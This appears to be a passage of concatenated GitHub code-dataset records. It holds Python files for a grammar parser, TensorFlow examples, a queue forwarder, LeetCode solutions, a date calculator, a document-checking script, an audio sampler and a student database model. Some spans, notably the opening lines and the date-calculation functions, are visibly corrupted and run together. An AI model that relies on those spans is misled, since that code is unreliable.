zip(data_features>h_mu+_k[i]*h_std, data_labels==1)])/len(data_labels)\n _fpr[i]=np.sum([a and b for a, b in zip(data_featuresh_mu+_k[i]*h_std, data_labels==2)])/len(data_labels)\n _fpr[i]=np.sum([a and b for a, b in zip(data_features lower_limit:\n rows[symbol] = row\n except:\n # BRK-B, RDS-B, BF-B, JW-A\n if symbol in [\"BRK-B\", \"RDS-B\", \"BF-B\", \"JW-A\"]:\n rows[symbol] = row\n pass\n\n print(i, row)\n\n# output\n# csv\ncsv_f = open(csv_fn, 'w', newline = '')\ncsvw = csv.writer(csv_f, delimiter = '\\t')\n\nfor symbol in sorted(rows.keys()):\n csvw.writerow(rows[symbol])\n\ncsv_f.close()\n","repo_name":"kjmatsuda/python-us-stock","sub_path":"python-club/ch4/get_ticker.py","file_name":"get_ticker.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70262289285","text":"from MyModule.production import getProducts\n\n\ndef getTable(products, variables):\n table = {}\n for v in variables:\n vProducts = getProducts(v, products)\n table[v] = vProducts\n return table\n\n\nclass Parser():\n\n def __init__(self, start_var, products, variables):\n self.start_var = start_var\n # table of each 'variable' and its 'productions'\n self.table = getTable(products, variables)\n\n# TODO:valid_it\n\n\nclass DepthParser(Parser):\n\n def __init__(self, start_var, products, variables):\n return super().__init__(start_var, products, variables)\n\n def parse(self, target):\n from MyModule.funcs import its_terminal, its_variable\n start = Node(self.start_var, target, \" \", None)\n for p in self.table[start.value]:\n start.childs.append(Node(p, target, start.value+\"->\"+p, start))\n if self.parse_inside(start.childs[-1]):\n start.valid = True\n return (start, True)\n return (start, False)\n\n def parse_inside(self, node):\n from MyModule.funcs import its_terminal, its_variable\n if not node.its_valid():\n node.valid = False\n return False\n if node.its_match():\n node.valid = True\n return True\n for c in node.value:\n if its_variable(c):\n for p in self.table[c]:\n new_value = node.value.replace(c, p, 1)\n node.childs.append(\n Node(new_value, node.target, 
c+\"->\" + p, node))\n if self.parse_inside(node.childs[-1]):\n node.valid = True\n return True\n return False\n\n\nclass BreadthParser(Parser):\n\n def __init__(self, start_var, products, variables):\n self.stack = []\n return super().__init__(start_var, products, variables)\n\n def parse(self, target):\n from MyModule.funcs import its_terminal, its_variable\n start = Node(self.start_var, target, \" \", None)\n for p in self.table[start.value]:\n nc = Node(p, target, start.value+\"->\"+p, start)\n start.childs.append(nc)\n self.stack.append(nc)\n while self.stack:\n if self.parse_inside(self.stack.pop(0)):\n return (start, True)\n\n return (start, False)\n\n def parse_inside(self, node):\n from MyModule.funcs import its_terminal, its_variable\n if not node.its_valid():\n node.valid = False\n return False\n if node.its_match():\n node.valid_it()\n return True\n for c in node.value:\n if its_variable(c):\n for p in self.table[c]:\n new_value = node.value.replace(c, p, 1)\n nc = Node(new_value, node.target, c+\"->\" + p, node)\n node.childs.append(nc)\n if nc.its_match():\n nc.valid_it()\n return True\n self.stack.append(nc)\n return False\n\n\nclass Node():\n\n def __init__(self, value, target, p, parent):\n self.p = p\n self.parent = parent\n self.valid = None\n self.value = value\n self.target = target\n self.childs = []\n\n def its_valid(self):\n if len(self.target) < len(self.value):\n return False\n from MyModule.funcs import its_terminal, its_variable\n for i in range(0, len(self.value)):\n if its_variable(self.value[i]):\n break\n if self.value[i] != self.target[i]:\n return False\n for i in range(-1, len(self.value)*-1, -1):\n if its_variable(self.value[i]):\n break\n if self.value[i] != self.target[i]:\n return False\n return True\n\n def its_match(self):\n return self.value == self.target\n\n def valid_it(self):\n self.valid = True\n if self.parent:\n self.parent.valid_it()\n\n\nclass S_Parser(Parser):\n\n def __init__(self, start_var, products, variables):\n return super().__init__(start_var, products, variables)\n\n def parse(self, target):\n from MyModule.funcs import its_terminal, its_variable\n start = Node(self.start_var, target, \" \", None)\n for p in self.table[start.value]:\n if p[0] == target[0]:\n start.childs.append(\n Node(p, target[1:], start.value+\"->\"+p, start))\n if self.parse_inside(start.childs[0]):\n return (start, True)\n return (start, False)\n\n def parse_inside(self, node):\n from MyModule.funcs import its_terminal, its_variable\n if not node.target:\n if not any(its_variable(c) for c in node.value):\n node.valid_it()\n return True\n else:\n return False\n for c in node.value:\n if its_variable(c):\n for p in self.table[c]:\n if p[0] == node.target[0]:\n node.childs.append(\n Node(node.value.replace(c, p, 1), node.target[1:], c+\"->\"+p, node))\n if self.parse_inside(node.childs[0]):\n return True\n break\n return False\n","repo_name":"Hame-daani/TLM-project","sub_path":"code/MyModule/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39821622096","text":"import tensorflow as tf\n\n# 创建值全部为0的张量\ntensor_zeros = tf.zeros(shape=[2, 3], # 2行3列\n dtype='float32') # 类型\n\n# 创建值全部为1的张量\ntensor_ones = tf.ones(shape=[2, 3], dtype='float32')\n\n# 创建正态分布随机张量\ntensor_nd = tf.random_normal(shape=[10], # 一维,10个元素\n mean=1.7, # 中位数\n stddev=0.2, # 标准差\n dtype='float32')\n# 创建形状和tensor_ones一样,值为0的张量\ntensor_zeros_like = 
tf.zeros_like(tensor_ones)\n\nwith tf.Session() as sess:\n print(tensor_zeros.eval()) # eval表示在session中执行计算\n print(tensor_ones.eval())\n print(tensor_nd.eval())\n print(tensor_zeros_like.eval())\n","repo_name":"Gaofan666/KesonData","sub_path":"深度学习/26_生成张量.py","file_name":"26_生成张量.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34461374795","text":"from queuing_hub.publisher import Publisher\nfrom queuing_hub.subscriber import Subscriber\n\n\nclass Forwarder:\n\n def __init__(\n self, sub: str, topic: str, max_num: int = 1,\n aws_profile_name=None,\n gcp_credential_path=None,\n gcp_project=None\n ):\n self.publisher = Publisher(\n aws_profile_name=aws_profile_name,\n gcp_credential_path=gcp_credential_path,\n gcp_project=gcp_project\n )\n self.subscriber = Subscriber(\n aws_profile_name=aws_profile_name,\n gcp_credential_path=gcp_credential_path,\n gcp_project=gcp_project\n )\n self.topic = topic\n self.sub = sub\n self.max_num = max_num\n\n def transport(self, ack: bool = True) -> list:\n messages = self.subscriber.pull(\n sub_list=[self.sub],\n max_num=self.max_num,\n ack=ack\n )\n\n responses = []\n if not messages:\n return responses\n\n for message in messages:\n response = self.publisher.push(\n topic_list=[self.topic],\n body=message\n )\n responses.append(response)\n return responses\n\n def pass_through(self):\n return self.transport(ack=False)\n","repo_name":"tosh2230/py-queuing-hub","sub_path":"queuing_hub/forwarder.py","file_name":"forwarder.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11570930084","text":"class Solution(object):\n def getMinDistSum(self, positions):\n \"\"\"\n :type positions: List[List[int]]\n :rtype: float\n \"\"\"\n def dist(x, y):\n return sum(sqrt((x - a) ** 2 + (y - b) ** 2) for a, b in positions)\n diff = 100\n x = sum(x for x, _ in positions) / float(len(positions))\n y = sum(y for _, y in positions) / float(len(positions))\n cur = dist(x, y)\n while diff > 1e-6:\n found = False\n for dx, dy in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n nx, ny = x + diff * dx, y + diff * dy\n new = dist(nx, ny)\n if new < cur:\n cur = new\n x, y = nx, ny\n found = True\n break\n if not found: diff /= float(2)\n return cur\n \n \n \n","repo_name":"htingwang/HandsOnAlgoDS","sub_path":"LeetCode/1515.Best-Position-For-A-Service-Centre/Best-Position-For-A-Service-Centre.py","file_name":"Best-Position-For-A-Service-Centre.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"99"} +{"seq_id":"32457394735","text":"# Python 2\n# Auther: Fadi Rustom\n\ndef nextDay(year, month, day):\n \"\"\"\n Returns the year, month, day of the next day.\n Simple version: assume every month has 30 days.\n \"\"\"\n if day Date1\", False\n return days\n\ndef isLeapYear(year):\n if year % 400 == 0:\n return True\n if year % 100 == 0:\n return False\n if year % 4 == 0:\n return True\n return False\n\ndef daysInMonth(year, month):\n if month ==1 or month ==3 or month==5 or month ==7 or month ==8 or month ==10 or month ==12:\n return 31\n if month ==2:\n if isLeapYear(year):\n return 29\n return 28\n else:\n return 30\n return 30\n\ndef test():\n test_cases = [((2012,9,30,2012,10,30),30), \n ((2012,1,1,2013,1,1),366),\n ((2012,9,1,2012,9,4),3),\n ((2013,1,1,1999,12,31), \"AssertionError\")]\n \n for (args, 
answer) in test_cases:\n try:\n result = daysBetweenDates(*args)\n if result != answer:\n print (\"Test with data:\", args, \"failed\")\n else:\n print (\"Test case passed!\")\n except AssertionError:\n if answer == \"AssertionError\":\n print (\"Nice job! Test case {0} correctly raises AssertionError!\\n\".format(args))\n else:\n print (\"Check your work! Test case {0} should not raise AssertionError!\\n\".format(args)) \n\ntest()\n\ndef myTest():\n ''' Test with True Prog'''\n assert daysBetweenDates (2013,1,1,2013,1,1) == 0\n assert daysBetweenDates (2013,1,1,2013,1,2) == 1\n assert daysBetweenDates (2013,1,1,2014,1,1) == 365\n assert nextDay(2012,2,28) == (2012,2,29)\n assert nextDay(2012,12,31) == (2013,1,1)\n print ('Tests finished')\n\nmyTest()\n","repo_name":"FadiRustom/FadiPython","sub_path":"daysBetweenDates.py","file_name":"daysBetweenDates.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"31526592796","text":"#encoding=utf-8\nimport os\nimport docx\nfrom win32com import client as wc\nimport re\n\nfrom app.checkSqlBySh import CheckSql\nfrom app.Mkdirs import Mkdirs\n\nclass DealPack:\n def __init__(self, dpath):\n self.dpath = dpath\n\n def GetShName(self, str1, filename, docxname, xqdir):\n \"\"\"\n :param str1: sbin脚本添加的内容\n :param filename: docx的绝对路径文件名\n :param docxname:docx的文件名\n :param xqdir:XQ号\n :return:\n \"\"\"\n tli = str1.split(\" \")\n for name in tli:\n if name.endswith('.sh'):\n shname = filename.replace(docxname, name)\n t = str1.split(' ')\n for s in t:\n if 'pybak' in s or 'pyback' in s:\n mkdirs = \"/\".join((xqdir, s))\n else:\n s = \" \".join((xqdir, s))\n mkdirs = ' '.join(('install ', s))\n #shname格式:'E:\\SVN\\2019\\20190110w\\特色业务平台\\t6\\fbap.20190110rw.t6\\XQ-2018-801\\TS_77044_AFA_20100117_pybak.sh'\n return shname, mkdirs\n\n def __dealDocxFile(self, filename):\n \"\"\"\n :function:word文档处理\n :param filename:\n :return:\n \"\"\"\n print(\"【*****__dealDocxFile开始处理文档[%s]*****】\" % filename)\n if os.path.isfile(filename):\n sfile = ('XQ', 'BUG', 'TR')\n listdir = filename.split('\\\\')\n listdir.pop()\n if listdir[-1].startswith(sfile):\n xqdir = listdir.pop()\n # 组建路径‘F:\\\\TFS_l\\\\文档&DB&AFEjar包\\\\WEEK\\\\2019\\\\20190117’\n mkpth = '\\\\'.join((listdir[0], \"\"))\n for p in listdir[1:]:\n print(p)\n mkpth = os.path.join(mkpth, p)\n print('sbin的目录是[%s], XQ号的名称是:[%s]' % (mkpth, xqdir))\n print(filename)\n file = docx.Document(filename)\n # 处理docx文档中的表格,处理cfg文件\n tables = file.tables\n\n for table in tables:\n for i in range(1, len(table.rows)):\n result = table.cell(1, 0).text\n if \"PORT\" in result:\n print(result)\n mk = Mkdirs(mkpth, result)\n\n print(\"段落数: \", str(len(file.paragraphs)))\n # 输出段落编号及段落内容\n for i in range(len(file.paragraphs)):\n # print(\"第\" + str(i) + \"段的内容是:\" + file.paragraphs[i].text)\n \"\"\"\n re.findall(r'\\w{2} \\w{2}_\\d{5}_X_\\d{8}.\\w{2}', file.paragraphs[i].text) #匹配fbapDB\n re.findall(r'\\w{2} \\w{2}_\\d{5}_\\w{3}_\\d{8}_pybak.sh', file.paragraphs[i].text) #匹配pybak.sh\n re.findall(r'\\w{2} \\w{2}_\\d{5}_\\w{4}_\\w{2}_\\d{8}.sh', file.paragraphs[i].text) #匹配bsmsDB\n \"\"\"\n # 检查安装手册里面的文档是否存在\n fp = file.paragraphs[i].text.replace('\\t', '')\n fp.rstrip()\n if \"mkdir\" in fp: # 拼接afa、afe的sh脚本\n print('>>>>>>>>>>>>>>>>>>>开始拼接afa、afe脚本<<<<<<<<<<<<<<<<<<<<')\n mkdirs = fp\n if \"inst1\" in mkdirs:\n print('afa:[%s]' % mkdirs)\n else:\n print('afe:[%s]' % mkdirs)\n mk = Mkdirs(mkpth, mkdirs)\n elif 
fp.endswith('.sh'):\n print('>>>>>>>>>>>>>>>>>>>>开始处理脚本[%s]<<<<<<<<<<<<<<<<<<<<<' % fp)\n t = fp.split(' ')\n for n in range(len(t)):\n if t[n].endswith('.sh'):\n rename = t[n]\n f = filename.split('\\\\').pop()\n # nfilename = filename.replace(f, file.paragraphs[i].text)\n nfilename = filename.replace(f, rename)\n print('新拼接的文件名是[%s]' % nfilename)\n if not os.path.isfile(nfilename):\n print(\"安装手册[%s]中的文件[%s]不存在\" % (filename, nfilename))\n return None\n else: # 拼接sbin下面所有的sh、add文件\n if \".sh\" in fp:\n for s in fp.split(' '):\n if s.endswith('.sh'):\n shs = s\n if re.findall(r'\\w{2}_\\d{5}_\\w_\\d{8}.\\w{2}', shs):\n print('【************fbapDB开始处理:[%s]************】' %fp)\n shn, mkdirs = self.GetShName(fp, filename, f, xqdir)\n elif re.findall(r'\\w{2}_\\d{5}_\\w{4}_\\w{2}_\\d{8}.sh', shs):\n print('【************bsmsDB开始处理:[%s]************】' % fp)\n print('bsmsdb:[%s]' % file.paragraphs[i].text)\n shn, mkdirs = self.GetShName(fp, filename, f, xqdir)\n elif re.findall(r'\\w{2}_\\d{5}_\\w{3}_\\d{8}_\\w{5,6}.sh', shs):\n print('【************pybak开始处理:[%s]************】' % fp)\n # mkdirs = '/'.join((xqdir, file.paragraphs[i].text))\n shn, mkdirs = self.GetShName(fp, filename, f, xqdir)\n Mkdirs(mkpth, mkdirs)\n else:\n continue\n print(shn)\n CheckSql(shn, mkpth, mkdirs)\n\n def TextFile(self):\n dlist = self.dpath.split('\\\\')\n print(dlist)\n filename = self.dpath\n if os.path.isfile(self.dpath):\n print(\"DealPack-->>self.dpath[%s]\" % filename)\n dfile = os.path.splitext(filename)\n if dfile[1] == \".docx\": # 处理docx文件\n self.__dealDocxFile(filename)\n elif dfile[1] == \".doc\": # 将doc文件转换成docx文件\n print(\"处理doc文件[%s]...\" % filename)\n w = wc.Dispatch('Word.Application')\n doc = w.Documents.Open(filename)\n newfile = \"\".join((dfile[0], \".docx\"))\n doc.SaveAs(newfile)\n self.__dealDocxFile(newfile)\n return '000000'\n\nif __name__ == '__main__':\n dpath = 'F:\\\\黄小宝的宝\\\\测试目录\\\\fbap.20190110rw.t6\\\\XQ-2018-801\\\\TS_75994_安装操作部署手册.docx'\n t = DealPack(dpath)\n t.TextFile()","repo_name":"huangchao20/MyScript","sub_path":"func/DealPackages.py","file_name":"DealPackages.py","file_ext":"py","file_size_in_byte":6609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11547075101","text":"import librosa\nimport librosa.display\nimport pyaudio\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport wave\nimport soundfile as sf\nimport pyrubberband as pyrb\nimport time\nfrom pathlib import Path\nimport threading\nimport os\n\nclass AudioSampler(object):\n def __init__(self):\n # PyAudio Initialization\n self.pa_format = pyaudio.paFloat32\n self.pa_channels = 1\n self.pa_rate = 44100\n self.pa_chunk = 1024 * 2\n self.p = None\n self.pa_stream = None\n #self.pa_length = 512\n self.pa_num_samples = 0\n\n # Librosa Initialization\n self.lr_length = 512\n self.lr_array = None\n self.lr_chunk = 1024 * 2\n self.lr_sr = None # note to set 44100 if not initialized by load\n\n # Filesystem Initialization\n self.files_list = []\n self.root_dir = os.getcwd()\n self.input_dir = self.root_dir + r'\\data\\ffmpeg\\outputs'\n\n def pa_stream_open(self):\n # Intergration WIP\n self.p = pyaudio.PyAudio()\n self.pa_stream = self.p.open(format=self.pa_format,\n channels=self.pa_channels,\n rate=self.pa_rate,\n input=True,\n output=False,\n stream_callback=self.callback,\n frames_per_buffer=self.pa_chunk)\n\n def import_file(self):\n self.files_list = os.listdir(self.input_dir)\n for path in os.listdir(self.input_dir):\n if 
os.path.isfile(os.path.join(self.input_dir, path)):\n self.files_list.append(path)\n #print(self.files_list)\n print(\"{0} of files added.\".format(len(self.files_list)))\n\n def lr_load(self):\n # Test driver\n file_name = self.input_dir + r'\\\\' + self.files_list[0]\n self.lr_array, self.lr_sr = librosa.load(file_name)\n\n def testd_centroid(self):\n cent_obj = librosa.feature.spectral_centroid(y=self.lr_array, sr=self.lr_sr, n_fft=self.lr_chunk,\n hop_length=self.lr_length)[0]\n print(cent_obj.shape)\n cent_frames = range(len(cent_obj))\n cent_t = librosa.frames_to_time(cent_frames, hop_length=self.lr_length)\n print(len(cent_t))\n\n plt.figure(figsize=(25,10))\n plt.plot(cent_t, cent_obj, color='r')\n plt.show()\n plt.savefig('testd_centroid.jpg')\n\n def start(self):\n pass\n\n def stop(self):\n print(\"Process Halted.\")\n\n def callback(self, in_data, frame_count, time_info, flag):\n # WIP\n self.lr_array = np.frombuffer(in_data, dtype=np.float32)\n\n def mainloop(self):\n pass\n\naudio = AudioSampler()\naudio.import_file()\naudio.lr_load()\naudio.testd_centroid()\naudio.stop()","repo_name":"colorlit/invoice","sub_path":"AudioSampling.py","file_name":"AudioSampling.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32538740310","text":"from itertools import combinations\r\nfrom math import pow, sqrt, acos, pi\r\n\r\nclass Triangle:\r\n\r\n def __init__(self, coords):\r\n if isinstance(coords, list):\r\n if len(coords) == 3:\r\n self.coords = coords\r\n else:\r\n raise ValueError(\"Wrong number of coordinates. Must be 3!\")\r\n else:\r\n raise TypeError(\"Argument must be a list of coordinates.\")\r\n\r\n\r\n def calculate_sides(self):\r\n self.sides = []\r\n for x, y in combinations(self.coords, 2):\r\n self.sides.append(sqrt(pow(y[0] - x[0], 2) + pow(y[1] - x[1], 2)))\r\n self.a, self.b, self.c = [round(side, 3) for side in self.sides]\r\n\r\n\r\n def calculate_angles(self):\r\n self.alpha = acos((self.b**2 + self.c**2 - self.a**2) / (2 * self.b * self.c))\r\n self.beta = acos((self.a**2 + self.c**2 - self.b**2) / (2 * self.a * self.c))\r\n self.gamma = acos((self.a**2 + self.b**2 - self.c**2) / (2 * self.a * self.b))\r\n self.angles = [round(x * 180 / pi, 3) for x in [self.alpha, self.beta, self.gamma]]\r\n\r\n\r\n# SSS: side-side-side\r\ndef sss(t1, t2):\r\n if len({x / y for x, y in zip(t1.sides, t2.sides)}) == 1:\r\n return True\r\n\r\n\r\n# AAA: angle-angle-angle\r\ndef aaa(t1, t2):\r\n a1 = set(t1.angles)\r\n a2 = set(t2.angles)\r\n if len(a1.intersection(a2)) >= 2:\r\n return True\r\n\r\n\r\n# SAS: side-angle-side\r\ndef sas(t1, t2):\r\n for obj in (t1, t2):\r\n obj.sides.sort()\r\n obj.angles.sort()\r\n \r\n s1, s2 = t1.sides, t2.sides\r\n a1, a2 = t1.angles, t2.angles\r\n\r\n if s1[0] / s2[0] == s1[1] / s2[1]:\r\n if a1[2] == a2[2]:\r\n return True\r\n if s1[1] / s2[1] == s1[2] / s2[2]:\r\n if a1[0] == a2[0]:\r\n return True\r\n if s1[2] / s2[2] == s1[0] / s2[0]:\r\n if a1[1] == a2[1]:\r\n return True\r\n return False\r\n\r\n\r\ndef similar_triangles(coords_1, coords_2):\r\n t1 = Triangle(coords_1)\r\n t2 = Triangle(coords_2)\r\n\r\n t1.calculate_sides()\r\n t1.calculate_angles()\r\n\r\n t2.calculate_sides()\r\n t2.calculate_angles()\r\n\r\n for t in (t1, t2):\r\n print(t.a, t.b, t.c)\r\n print([angle for angle in t.angles])\r\n\r\n if sss(t1, t2):\r\n return True\r\n\r\n if aaa(t1, t2):\r\n return True\r\n \r\n if sas(t1, t2):\r\n return True\r\n \r\n return 
False\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # These \"asserts\" are used for self-checking and not for an auto-testing\r\n assert similar_triangles([(0, 0), (1, 2), (2, 0)], [\r\n (3, 0), (4, 2), (5, 0)]) is True, 'basic'\r\n assert similar_triangles([(0, 0), (1, 2), (2, 0)], [(\r\n 3, 0), (4, 3), (5, 0)]) is False, 'different #1'\r\n assert similar_triangles([(0, 0), (1, 2), (2, 0)], [\r\n (2, 0), (4, 4), (6, 0)]) is True, 'scaling'\r\n assert similar_triangles([(0, 0), (0, 3), (2, 0)], [\r\n (3, 0), (5, 3), (5, 0)]) is True, 'reflection'\r\n assert similar_triangles([(1, 0), (1, 2), (2, 0)], [(\r\n 3, 0), (5, 4), (5, 0)]) is True, 'scaling and reflection'\r\n assert similar_triangles([(1, 0), (1, 3), (2, 0)], [(\r\n 3, 0), (5, 5), (5, 0)]) is False, 'different #2'\r\n assert similar_triangles(\r\n [[-3, -1], [3, 3], [-3, 1]], [[-3, -9], [9, 9], [3, 9]]) is True\r\n \r\n print(\"Coding complete? Let's try tests!\")\r\n\r\n \r\n\r\n","repo_name":"TvylorMvde/checkio-solutions","sub_path":"Similar-triangles/similar_triangles.py","file_name":"similar_triangles.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"17335780246","text":"from services.database_service import *\nfrom services.s3_service import *\nfrom datetime import date, datetime, time\n\ndef create_student(data):\n connection = get_database_connection()\n student_id = data.form['student_id']\n student_name = data.form['student_name']\n student_nric = data.form['student_nric']\n student_gender = data.form['student_gender']\n student_programme = data.form['student_programme']\n student_email = data.form['student_email']\n student_mobile = data.form['mobile_number']\n resume_file = data.files['resume']\n image_file = data.files['student_image']\n lecturer_id = \"p123\"\n \n insert_sql = \"INSERT INTO Student VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n cursor = connection.cursor()\n image_path = f\"students/{student_id}/profile.png\"\n resume_path = f\"students/{student_id}/resume.pdf\"\n uploadToS3(image_file, image_path)\n uploadToS3(resume_file, resume_path)\n image_url = get_object_url(image_path)\n resume_url = get_object_url(resume_path)\n try:\n cursor.execute(insert_sql, (student_id, student_name, student_nric, student_gender, student_programme,student_email, student_mobile,image_url,resume_url,lecturer_id))\n connection.commit()\n print(\"Successfully Uploading into Database\")\n uploadToS3(resume_file, f'students/{student_id}/resume.pdf')\n cursor.close()\n return True\n\n except Exception as e:\n cursor.close()\n print(str(e))\n return False\n\n finally:\n connection.close()\n\ndef get_student(student_id):\n connection = get_database_connection()\n get_sql = 'SELECT * FROM Student WHERE student_id = %s'\n cursor = connection.cursor()\n try:\n cursor.execute(get_sql, student_id)\n return cursor.fetchone()\n except Exception as e:\n print(str(e))\n return False\n finally:\n cursor.close()\n connection.close()\n \ndef get_all_students():\n connection = get_database_connection()\n\n query = \"SELECT * FROM Student\"\n cursor = connection.cursor()\n\n try:\n cursor.execute(query)\n return cursor.fetchall()\n except Exception as e:\n print(str(e))\n return False\n finally:\n cursor.close()\n connection.close()\n\n#write a function to remove student\ndef remove_student(student_id):\n connection = get_database_connection()\n\n delete_query = \"DELETE FROM Student WHERE student_id = %s\"\n cursor = 
connection.cursor()\n\n try:\n cursor.execute(delete_query, student_id)\n return True\n except Exception as e:\n print(str(e))\n return False\n finally:\n cursor.close()\n connection.close()\n\n#Write a function to create job application based on student_id and offer_id\ndef apply_company(student_id, offer_id):\n connections = get_database_connection()\n #Get date now\n dateNow = datetime.now()\n status = \"pending\"\n\n insert_query = \"INSERT INTO InternshipApplication VALUES(%s, %s, %s, %s)\"\n\n cursor = connections.cursor()\n try:\n cursor.execute(insert_query, (student_id, offer_id, dateNow.strftime(\"%Y-%m-%d %H:%M:%S\"), status))\n connections.commit()\n return True\n except Exception as e:\n print(str(e))\n return False\n finally:\n cursor.close()\n connections.close()\n \ndef get_detail_applied_internships(student_id):\n connection = get_database_connection()\n query = \"SELECT IO.job_title, IO.job_description, IO.allowance, C.company_name, IA.application_date FROM InternshipOffer IO INNER JOIN Company C ON IO.company_id = C.company_id INNER JOIN InternshipApplication IA ON IO.offer_id = IA.offer_id WHERE IA.student_id = %s\"\n cursor = connection.cursor()\n try:\n cursor.execute(query, student_id)\n return cursor.fetchall()\n except Exception as e:\n print(str(e))\n return False\n finally:\n cursor.close()\n connection.close()\n\n\ndef get_applied_internships(student_id):\n connection = get_database_connection()\n query = \"SELECT offer_id FROM InternshipApplication WHERE student_id = %s\"\n\n cursor = connection.cursor()\n try:\n cursor.execute(query, student_id)\n return cursor.fetchall()\n except Exception as e:\n print(str(e))\n return False\n finally:\n cursor.close()\n connection.close()\n","repo_name":"jason6356/aws-live","sub_path":"models/student_model.py","file_name":"student_model.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13447640840","text":"\"\"\"\nGiven a n x n matrix where each of the rows and columns are sorted in ascending order,\nfind the kth smallest element in the matrix.\nNote that it is the kth smallest element in the sorted order, not the kth distinct element.\nExample:\nmatrix = [\n [ 1, 5, 9],\n [10, 11, 13],\n [12, 13, 15]\n],\nk = 8,\nreturn 13.\n\"\"\"\nclass Solution(object):\n def kthSmallest(self, matrix, k):\n \"\"\"\n :type matrix: List[List[int]]\n :type k: int\n :rtype: int\n \"\"\"\n n = len(matrix)\n m = len(matrix[0])\n\n l = matrix[0][0]\n r = matrix[-1][-1] + 1\n\n while l < r:\n count = 0\n mid = (l+r)//2\n # 我们要找有多少个元素小于或等于mid\n count = self.get_count(matrix, mid, m)\n if count < k:\n l = mid + 1\n else:\n r = mid\n\n return l\n\n # 求count是,从左下往右上遍历,O(N)\n def get_count(self, matrix, target, m):\n i = 0\n j = m - 1\n counter = 0\n while j >= 0 and i < m:\n # !!! 小于等于,必须包含相等,即便等于目标值的数量\n if matrix[i][j] <= target:\n counter += j + 1\n #是按一列列来计算的,算完一列移动到下一列\n i += 1\n else:\n j -= 1\n return counter\n\n\"\"\"\nhttps://www.youtube.com/watch?v=1VkP3Ndu1C4&t=311s\n\"\"\"","repo_name":"Nexnull/Leetcoding","sub_path":"leetcode/Matrix/378. 有序矩阵中第K小的元素 .py","file_name":"378. 
有序矩阵中第K小的元素 .py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"73790773444","text":"from itertools import permutations\n\n\ndef is_mapping(user_id, banned_id):\n for i in range(len(user_id)):\n if len(user_id[i]) != len(banned_id[i]):\n return False\n for j in range(len(user_id[i])):\n if banned_id[i][j] == '*':\n continue\n elif user_id[i][j] != banned_id[i][j]:\n return False\n return True\n\n\ndef solution(user_id, banned_id):\n answer = []\n for per_id in permutations(user_id, len(banned_id)):\n if is_mapping(per_id, banned_id):\n per_id = set(per_id)\n if per_id not in answer:\n answer.append(per_id)\n\n return len(answer)\n\n\nprint(solution([\"frodo\", \"fradi\", \"crodo\", \"abc123\", \"frodoc\"], [\"fr*d*\", \"abc1**\"]))","repo_name":"ketkat001/Programmers-coding","sub_path":"Level_4/불량사용자.py","file_name":"불량사용자.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70751945925","text":"n = int(input())\nmylist = [input() for word in range(n)]\n\n\n\ndef summa_values(word):\n word = list(word.upper())\n numbers = sum(list(map(lambda x: ord(x) - ord('A'), word)))\n return numbers\n\nresult = sorted(sorted(mylist), key=lambda x: summa_values(x))\nprint(*result, sep='\\n')\n","repo_name":"orlovsky-maya/Generation_Python_2","sub_path":"Functions/Exam/Part2/10. gematria_words.py","file_name":"10. gematria_words.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"73264305605","text":"from src.view.view import View\nfrom src.view.UI.text import Text\nfrom src.view.UI.button import Button\nfrom src.enum.command import Command\nfrom src.view.blinkingRect import BlinkingRect\nfrom .Game.player import Player\nimport pygame as py\n\nclass ViewLevel(View):\n \"\"\"Klasa widoku poziomu gry.\"\"\"\n def __init__(self, surface):\n super().__init__(surface)\n self.__all_sprites = py.sprite.Group()\n self.__paused = False\n self.__gameover = False\n self.__won = False\n self.__camera = None\n self.__pause_text = Text(\"Spauzowano.\", int(0.04 * self._surfaceSize[0]), (0.35 * self._surfaceSize[0], 0.05 * self._surfaceSize[1]))\n self.__won_text = Text(\"Gratulacje! Naciśnij Esc przy wybrać kolejny poziom.\", int(0.04 * self._surfaceSize[0]), (0.05 * self._surfaceSize[0], 0.05 * self._surfaceSize[1]))\n self.__lost_text = Text(\"YOU DIED. 
